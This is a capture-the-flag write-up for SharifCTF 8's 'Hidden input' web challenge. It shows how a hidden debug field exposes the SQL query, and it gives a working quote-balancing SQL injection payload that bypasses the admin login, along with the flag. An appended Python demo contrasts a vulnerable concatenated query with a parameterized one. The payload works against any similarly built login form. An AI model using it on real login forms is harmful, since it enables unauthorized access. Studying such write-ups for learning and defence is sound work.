Information
Version

| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF
- Name : SharifCTF 8
- Website : ctf.certcc.ir
- Type : Online
- Format : Jeopardy
- CTF Time : link
50 - Hidden input - Web
Login if you can :)
There is a hidden input:

```html
<form method="POST" action="login.php">
```

And change the `debug` POST value to get: `Username=admin&Password=pass&debug=1`.
This shows us the SQL query used.

```
username: admin
```
At first I thought this payload should work, but it didn't:

```
Username=admin%27%29--+-&Password=sdf&debug=0
```

```
username: admin')-- -
```
Comments don't seem to work, so let's build a fully working query:

```
Username=admin&Password=%27%29+OR+1%3D1+OR+999+%3E+ORD%28%27a&debug=1
```

```
username: admin
```
Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}
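
Why the quote-balancing payload above succeeds without a comment, and what stops it, as an added example (not code from the challenge or from the author of this write-up). It assumes the server concatenates each value inside `('...')`; the table, the stored password and the function names are constructed, and in-memory SQLite stands in for the backend behind `login.php`, with `ORD()` registered because SQLite lacks it.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    # Constructed stand-in for the challenge database (not the real schema).
    db = sqlite3.connect(":memory:")
    # SQLite has no ORD(); register one so the payload parses as it would on MySQL.
    db.create_function("ORD", 1, lambda s: ord(s[0]) if s else 0)
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_vulnerable(db, username, password):
    # Assumed query shape: each value wrapped in ('...') by string concatenation.
    sql = ("SELECT username FROM users WHERE username = ('" + username +
           "') AND password = ('" + password + "')")
    return sql, db.execute(sql).fetchone()

def login_parameterized(db, username, password):
    # Placeholders keep the submitted values as data; quotes inside them are inert.
    sql = "SELECT username FROM users WHERE username = (?) AND password = (?)"
    return sql, db.execute(sql, (username, password)).fetchone()

def parse_body(body):
    # Decode an application/x-www-form-urlencoded POST body as the server would.
    fields = parse_qs(body, keep_blank_values=True)
    return fields["Username"][0], fields["Password"][0]

# POST body taken from the write-up above.
BODY = "Username=admin&Password=%27%29+OR+1%3D1+OR+999+%3E+ORD%28%27a&debug=1"

if __name__ == "__main__":
    db = make_db()
    user, pwd = parse_body(BODY)
    for fn in (login_vulnerable, login_parameterized):
        sql, row = fn(db, user, pwd)
        print(fn.__name__, "->", row)
        print("   ", sql)
```

In the concatenated query the trailing `')` supplied by the server closes `ORD('a`, so the statement stays syntactically valid and the `OR 1=1` branch matches every row; with placeholders the same bytes are compared as a literal password and no row is returned.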